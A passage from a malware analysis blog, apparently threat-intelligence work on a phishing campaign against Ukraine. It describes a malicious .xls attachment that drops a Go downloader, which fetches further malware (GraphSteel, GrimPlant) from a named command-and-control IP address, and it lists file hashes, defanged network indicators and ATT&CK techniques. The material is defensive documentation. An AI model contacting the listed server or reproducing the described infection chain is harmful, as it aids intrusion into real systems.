center;"><span id="docs-internal-guid-d1624fe7-7fff-b1cc-aa81-2f56af4f70da"><br /></span></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt; text-align: justify;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Payload</span></h3><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The decoded file (Base-Update.exe) is a PE64 file written in Golang and known as </span><span style="font-family: Arial; font-size: 11pt; text-align: left; white-space: pre-wrap;">Elephant Downloader or GoDownloader</span><span style="font-family: Arial; font-size: 11pt; white-space: pre-wrap;">. It has an invalid Microsoft certificate attached.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 317px; overflow: hidden; width: 264px;"><img height="317" src="https://lh4.googleusercontent.com/t6g6qyZa71S3rA3N8VEtrt_FS9PilTrgsUiyStzKayFjzD2DMTg4MHHA_A-GBtV244rjpuon9Sbp2XBwAszllrOIj1Gl3CcTx2nwfoAlXgwjTqNdAUAh0xNpiYRfRpcUa6QYkunQ" style="margin-left: 0px; margin-top: 0px;" width="264" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; 
font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Once executed, this file connects to the IP address ‘194.31.98.124:443’ (located in the United States) to download another file, ‘java-sdk.exe’, and drop it in the ‘C:\Users\User\.java-sdk’ folder. </span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 291px; overflow: hidden; width: 624px;"><img height="291" src="https://lh6.googleusercontent.com/O8VJ8xmGe_ds_gCDjCpsbp_jEwdFELXdl1LEiU6TH_sHsxPsqLUEK3zFpcCwE4qQy9uo5fucCNJ8dN1DOcE4iEowW55--4X-92ZFm4BGMJ0Crlz-uTXk_-KIvMx4pM7hrrbp1qno" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The dropped file is also a PE64 file written in Golang, but it doesn’t carry any digital signature. 
It is a Trojan-Downloader too.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 352px; overflow: hidden; width: 247px;"><img height="352" src="https://lh4.googleusercontent.com/rW2mrMZrwE-EdBdo3Hta8gWioVpXpfzvAoC0WV0s5VImQlrLIaFpbaJZrvBkwqoF_0PHehLxrcUeInJo6oqTrYW9n61qmFITYm8JFlRHluYTskEYFkZlSloSWPvGECe9XmtX3t7H" style="margin-left: 0px; margin-top: 0px;" width="247" /></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">This executable establishes a connection to remote servers and starts downloading the <i>GraphSteel</i> and <i>GrimPlant</i> malware.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 281px; overflow: hidden; width: 624px;"><img height="281" src="https://lh5.googleusercontent.com/GUsAojnzB449UBy3885orIQkaEehqCf0fcsRkfT4LaLiUOws0Ja7TjClUcYIf1Ksy1CCcRU9utKrvcMG-hakkhkbAPyqXwRxEACMIQdM4L18Wt8Zzt5_hquiSVD8kf9kg6zyqNZ_" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><p 
dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 167px; overflow: hidden; width: 624px;"><img height="167" src="https://lh5.googleusercontent.com/WlNgVkL5-F7-qnLejY5v9WMLrxBg6SopcU2qroDt510CzQ7p7rU62KJCaJPugK1YV6H-_G6BXZV2ZyNutHfqmAjnUFz1gO-j-p3VjDN4Fj3iXDopcULTZfpq3azYRy2er2nqpGE3" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 164px; overflow: hidden; width: 624px;"><img height="164" src="https://lh4.googleusercontent.com/Cp71Jxh0DsDriSzDRFaVnnrNbAt4gyDLzwh37KeeEGl0j2HA4Ho1wcKm5uoekM3A1hzORp-OarHRw6gNmr2MPO_tUxsNvhsQX2ZzqsV2X_S2j_bLOCI2mugpDZalj7r-0WQWtdoq" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 143px; overflow: hidden; width: 624px;"><img height="143" src="https://lh4.googleusercontent.com/UGKftzwrvgB2KqJodYDfnd0276yskR5bXIaJBrwkc-jGnpweQJyC0YeY3qMRWRxCr_JovHcJ1kkzcUUxp-FLCccUEcDYJpj9qM8AFC0eyucY8vMjGM09nvXQ7y5wkKgMKB4clxMg" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><br /><br /><h2 dir="ltr" style="line-height: 1.3800000000000001; margin-bottom: 0pt; margin-top: 0pt; text-align: 
justify;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Conclusion</span></h2><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The Ukrainian government has become a major target since Russia invaded Ukraine. This time the malicious software arrives as an email attachment, an ‘.xls’ file. The file contains a Visual Basic script copied from a website hosting open-source VB scripts. The borrowed script decodes the payload (PE64) saved inside the workbook. The dropped file downloads a trojan-downloader, which in turn downloads two more files: the GraphSteel and GrimPlant malware.</span></p><br /><h2 dir="ltr" style="line-height: 1.3800000000000001; margin-bottom: 6pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">IoCs</span></h2><h3 dir="ltr" style="line-height: 1.3800000000000001; margin-bottom: 4pt; margin-top: 16pt;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Files</span></h3><br /><div align="left" dir="ltr" style="margin-left: 3pt;"><table style="border-collapse: collapse; border: none;"><colgroup><col width="83"></col><col width="431"></col><col width="119"></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; 
vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">File name</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">SHA256</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Description</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Заборгованість по зарплаті.xls</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; 
border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">c1afb561cd5363ac5826ce7a72f0055b400b86bd7524da43474c94bc480d7eff</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Email attachment</span></p></td></tr><tr style="height: 25.998046875pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Base-Update.exe</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: 
pre-wrap;">9e9fa8b3b0a59762b429853a36674608df1fa7d7f7140c8fccd7c1946070995a</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">GoDownloader</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">java-sdk.exe</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">8ffe7f2eeb0cbfbe158b77bbff3e0055d2ef7138f481b4fac8ade6bfb9b2b0a1</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span 
style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">GoDownloader</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">oracle-java.exe</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">99a2b79a4231806d4979aa017ff7e8b804d32bfe9dcc0958d403dfe06bdd0532</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">GrimPlant</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 
5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">microsoft-cortana.exe</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">c83d8b36402639ea3f1ad5d48edc1a22005923aee1c1826afabe27cb3989baa3</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">GraphSteel</span></p></td></tr></tbody></table></div><br /><h3 dir="ltr" style="line-height: 1.3800000000000001; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Network indicators</span></h3><br /><div align="left" dir="ltr" style="margin-left: 3pt;"><table style="border-collapse: collapse; border: none;"><colgroup><col width="644"></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: 
solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">IP</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https://194[.]31.98.124:443/i</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https://194[.]31.98.124:443/p</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; 
white-space: pre-wrap;">https://194[.]31.98.124:443/m</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">ws://194[.]31.98.124:443/c</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">194[.]31.98.124</span></p></td></tr></tbody></table></div><br /><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><h3 dir="ltr" style="line-height: 1.3800000000000001; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">MITRE attack techniques</span></h3><br /><div align="left" dir="ltr" style="margin-left: 0.75pt;"><table style="border-collapse: collapse; border: none;"><colgroup><col width="149"></col><col width="499"></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid 
#000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Tactic</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Technique</span></p></td></tr><tr style="height: 23.09912109375pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Initial Access</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1566/001/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: 
normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1566.001 – Phishing: Spearphishing Attachment</span></a></p></td></tr><tr style="height: 23.09912109375pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Execution</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1204/002/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1204.002 – User Execution: Malicious File</span></a></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1059/005/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1059.005 – Command and Scripting Interpreter: Visual Basic</span></a></p></td></tr><tr style="height: 23.25pt;"><td style="border-bottom: solid 
#000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Command and Control</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1568/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1568 – Dynamic Resolution</span></a></p></td></tr></tbody></table></div><br /><br /><h2 dir="ltr" style="line-height: 1.3800000000000001; margin-bottom: 6pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">References</span></h2><ol style="margin-bottom: 0; margin-top: 0; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: decimal; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.3800000000000001; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://cert.gov.ua/article/38374" style="text-decoration-line: none;"><span style="color: #1155cc; 
font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://cert.gov.ua/article/38374</span></a><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span></p></li><li aria-level="1" dir="ltr" style="font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: decimal; vertical-align: baseline;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 14.6667px; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: Arial;"><a href="https://blog.malwarebytes.com/threat-intelligence/2022/04/new-uac-0056-activity-theres-a-go-elephant-in-the-room/">https://blog.malwarebytes.com/threat-intelligence/2022/04/new-uac-0056-activity-theres-a-go-elephant-in-the-room/</a> </span></span></p></li></ol><span><!--more--></span><span><!--more--></span>Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-8119716373843929802022-03-17T23:22:00.001-07:002022-03-19T02:54:03.912-07:00Analysis of CaddyWiper<p> <img height="192" src="https://lh4.googleusercontent.com/3jtKmbVfUbbPZAIsgO9pLw6figip-s9a4hN9zz-jvXOBfcauKce0Lr1PTBKNRfxnT4tZkBkP57nv_dIdBCTWkuXQg6cttAU2D3Vt1VA3uwBk2xIUn-uxLQ7L4VltV6bPYnI2r-l9" style="background-color: white; color: #141519; font-family: Arial; font-size: 14.6667px; margin-left: 0px; margin-top: 0px; text-align: center; white-space: pre-wrap;" width="533" /></p><span id="docs-internal-guid-38a7aac9-7fff-3750-9d24-f457d71c5e2f"><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; 